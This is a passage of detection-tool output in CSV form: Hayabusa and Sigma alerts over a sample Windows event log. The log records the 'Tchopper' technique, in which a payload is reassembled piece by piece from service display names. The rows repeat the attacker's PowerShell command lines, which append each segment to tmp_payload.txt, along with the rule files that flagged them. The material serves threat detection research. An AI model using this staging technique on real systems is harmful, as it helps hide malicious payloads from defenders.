+00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:02.737 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:04.183 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:04.198 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:04.198 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:05.632 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:05.648 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:05.648 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:07.101 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:07.101 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:07.101 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:08.552 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:08.552 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:08.552 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:10.020 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:10.036 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:10.036 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:11.507 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:11.523 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:11.523 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:12.952 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:12.952 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:12.952 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:14.409 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:14.409 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:14.409 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:15.863 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:15.863 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:15.863 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:17.308 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:17.324 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:17.324 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:18.775 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:18.790 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:18.790 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:20.263 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:20.263 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:20.263 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:21.707 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:21.722 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:21.722 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:23.164 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:23.164 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:23.164 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:24.619 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:24.619 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:24.619 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:26.075 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:26.075 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:26.075 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:27.559 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:27.575 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:27.575 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:29.014 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:29.014 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 